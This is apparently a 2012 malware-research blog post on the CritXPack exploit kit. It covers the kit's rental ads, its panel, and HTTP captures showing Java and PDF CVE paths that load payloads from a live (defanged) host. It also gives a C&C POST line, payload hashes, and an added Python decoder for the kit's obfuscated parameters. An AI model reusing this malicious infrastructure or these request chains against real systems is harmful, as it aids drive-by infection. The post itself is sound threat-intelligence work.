2012-11-12 - Connect the dots.
Meet CritXPack (Previously Vintage Pack)
[Image: CritXPack]

It was named Vintage Pack at that time:
The enrollment form was simple:
[Image: Vintage Pack form to apply]
Rental cost: $400 per month, $100 per week (translated from the Russian text of the form).
A few days ago the banner/name changed. Here is the new "apply" form:
[Image: CritXPack apply form]
Here is the text:
Rent: 30$ - 1 day; 150$ - 1 week; 500$ - 1 month; traffic limit - 100k hits per day.
License on your server: 600$ - 3 month; 900$ - 6 month; 1200$ - 1 year; +200$ - multidomain license.
Translation of the Russian part:
PS: We have changed the banner and the name that were used during the test period and the trial advertising campaign. The bundle (the exploit pack) is now running in normal mode; the name and banner will not change. At the moment there is NO advertising on the specialised forums. Feedback from our partners who use the bundle and have a reputation on the relevant forums can be obtained PRIVATELY and only with their consent.
And thanks to Jindrich Kubec from Avast, who yesterday shared an unusual URL pattern,
[Image: Jindrich Kubec's tweet about the new kind of URL]
we can now say hello to CritXPack.
[Image: CritXPack login screen, 2012-11. Note the captcha (3rd time I see this on a bad guy's panel, after Upas and then Blackhole 2.0)]
[Image: Updated login screen (2013-02)]
There are some double-hit counter-measures (on a second visit you'll get a 502 error).
There are some geolocation features (it seems; the filter could also sit outside of the EK):
[Image: Filter in action for a localized strike]
I tested different vulnerability paths on it:
CVE-2012-1723 (seems safe (?!))
[Image: CVE-2012-1723 path on CritXPack (safe)]
```
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0053u0053u0046
200 OK (application/java-archive) -- 65571830100b0d809b44fefc094b5bf4
```
[Image: 65571830100b0d809b44fefc094b5bf4 nicely tagged in VirusTotal]
CVE-2012-4681 Boom...
[Image: CVE-2012-4681 path in CritXPack]
```
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
```
MDAC path (seems safe)
[Image: MDAC path on CritXPack, safe, but note PluginDetect 0.7.9 :)]
```
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
```
CVE-2011-2010 path (seems safe):
[Image: CVE-2011-2010 path on CritXPack (safe)]
```
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
GET http://magrety.herapid .org/b081112s/a.Test
404 Not Found (text/html)
```
CVE-2010-0188 Boom...
[Image: CVE-2010-0188 path in CritXPack]
```
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
304 Not Modified ()
GET http://magrety.herapid .org/b081112s/a.Test
404 Not Found (text/html)
GET http://magrety.herapid .org/b081112s/p5.php?t=u0059u0053u0072u0074u0035u0044u0072u0072u0035u0031&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1NNEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw
200 OK (application/pdf) -- d23236aaa9756f74d51c42e5109d7927
GET http://magrety.herapid .org/b081112s/load.php?e=u0050u0064u0066&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
```
CVE-2011-3544 Boom...
[Image: CVE-2011-3544 path on CritXPack]
```
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0031u0041u0035u0044
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
```
CVE-2012-0507 Boom...
[Image: CVE-2012-0507 path on CritXPack]
```
GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)
GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)
GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0072u0072u0035u0053u0035
200 OK (application/java-archive)
GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
```
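The captures above, as an added example that is not part of the original post and not the kit's code: a small Python script that decodes the `uXXXX`-obfuscated query parameters (JavaScript `\uXXXX` escapes with the backslashes stripped, so `u004au0061u0076u0061` reads `Java`) and tells, for each captured session, whether the chain reached the payload stage, i.e. `load.php` answering with `application/octet-stream`, which is what the post marks as "Boom". The request lines are transcribed from the captures above with the host omitted and the long `oh=` parameter dropped; the decoded `t` values are shown but not interpreted.

```python
"""Added example (not from the original post, not the kit's code): decode the
obfuscated query parameters of the captured CritXPack requests and report, per
captured session, whether the kit got as far as serving the payload."""
import re
from urllib.parse import parse_qsl

# The kit writes parameter values as JavaScript \uXXXX escapes with the
# backslashes stripped: "u004au0061u0076u0061" -> "Java".
_U_TOKEN = re.compile(r"u([0-9a-fA-F]{4})")
_ALL_TOKENS = re.compile(r"(?:u[0-9a-fA-F]{4})+")


def decode_u_escapes(value: str) -> str:
    """Decode a value made only of uXXXX tokens; leave anything else untouched
    (a base64 value such as the 'oh' parameter must not be mangled by chance
    matches)."""
    if not _ALL_TOKENS.fullmatch(value):
        return value
    return _U_TOKEN.sub(lambda m: chr(int(m.group(1), 16)), value)


def decode_query(request_path: str) -> dict:
    """Split the query string off the path and decode every parameter value."""
    _, _, query = request_path.partition("?")
    return {k: decode_u_escapes(v) for k, v in parse_qsl(query, keep_blank_values=True)}


def script_name(request_path: str) -> str:
    """'/b081112s/load.php?e=...' -> 'load.php'."""
    return request_path.partition("?")[0].rsplit("/", 1)[-1]


# Constructed from the captures in the post: (request path, response content
# type). Shortened to the requests that matter for the verdict.
SESSIONS = {
    "CVE-2012-1723": [  # the post calls this one "seems safe"
        ("/b081112s/i.php", "text/html"),
        ("/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0053u0053u0046",
         "application/java-archive"),
    ],
    "CVE-2012-4681": [  # "Boom": jar, then the payload
        ("/b081112s/i.php", "text/html"),
        ("/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072",
         "application/java-archive"),
        ("/b081112s/load.php?e=u004au0061u0076u0061"
         "&token=u0064u0065u0066u0061u0075u006cu0074&", "application/octet-stream"),
    ],
    "CVE-2010-0188": [  # "Boom": PDF, then the payload
        ("/b081112s/i.php", "text/html"),
        ("/b081112s/js/pd.js", ""),  # 304 Not Modified, no body
        ("/b081112s/p5.php?t=u0059u0053u0072u0074u0035u0044u0072u0072u0035u0031",
         "application/pdf"),
        ("/b081112s/load.php?e=u0050u0064u0066"
         "&token=u0064u0065u0066u0061u0075u006cu0074&", "application/octet-stream"),
    ],
}


def reached_payload(session) -> bool:
    """True when load.php served an octet-stream: an exploit fired and the kit
    handed out the executable."""
    return any(script_name(p) == "load.php" and ct == "application/octet-stream"
               for p, ct in session)


def exploit_vector(session):
    """The decoded 'e' parameter of load.php ("Java", "Pdf"), or None when the
    chain stopped before the payload stage."""
    for p, _ in session:
        if script_name(p) == "load.php":
            return decode_query(p).get("e")
    return None


def report(sessions=SESSIONS) -> dict:
    """Per-session verdict plus the decoded parameters of every request."""
    return {
        name: {
            "payload_served": reached_payload(s),
            "vector": exploit_vector(s),
            "requests": [(script_name(p), decode_query(p), ct) for p, ct in s],
        }
        for name, s in sessions.items()
    }


if __name__ == "__main__":
    for name, r in report().items():
        verdict = ("payload served via %s" % r["vector"] if r["payload_served"]
                   else "chain stopped, no payload")
        print(f"{name}: {verdict}")
        for script, params, ct in r["requests"]:
            print(f"    {script:10s} {ct:26s} {params}")
```

The verdict logic is deliberately narrow: a `j.php` or `p5.php` response alone only proves the exploit file was delivered, while `load.php` answering `application/octet-stream` is the observable sign that the exploit actually ran on the victim and fetched the payload, which matches how the post separates "seems safe" from "Boom".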
What about the file tree of the server?
Here are some of the directories/files I was able to see:
```
/b081112s/load.php
/b081112s/cpt.php
/b081112s/panel.php
/b081112s/captcha.php
/b081112s/i.php
/b081112s/j.php
/b081112s/f/
/b081112s/config.php
/b081112s/img/space.png
/b081112s/img/btn_signin.png
```
Out of the scope of this post, but what about the payload?
a6a61216942a1de358c5b55d8fb66cb1 (yesterday)
and b333ccb16027f0e168ff1846ea913a58, something with a C&C here:
```
lezniklitoristorii .in POST /image/ukash-psk/price.php HTTP/1.1
```
In my opinion it's directly related to the Casier ransomware / GangstaService affiliate. Remember?
IE (Ireland) != IR (Iran). (Any feedback on the payload is welcome :) It may just be a Zbot/Citadel.)
All the files in one Zip:
[Image: Content of the Zip]
Want to read more about CVEs and Exploit Kits?
Common Exploit Kits 2012 Poster - 2012-11-11 - Mila - Contagio
Wild Wild West - 2012-10-23 - Kahu Security
An Overview of Exploit Packs (Update 17) - 2012-10-12 - Mila - Contagio
Want to read more about the payload?
Casier on botnets.fr
Ransomware Casier - Sharing Design with Lyposit - Gaelic & Persian (?) - 2012-09-19
Ransomware « Trojan.Casier » Panel - 2012-09-18 - Malekal Morte - Malekal's Site
Karagny.L unpack - 2012-09-04 - RootBsd - Malware.lu technical analysis
Gangstaservice Winlock Affiliate - 2012-08-01 - Xylitol - Xylibox
Post Publication:
Got Malware? Rent an Exploit Service - Kevin Stevens - The Day Before Zero - Damballa - 2013-01-29
Meet Safe Pack (v2.0)... Again :) - 2013-04-21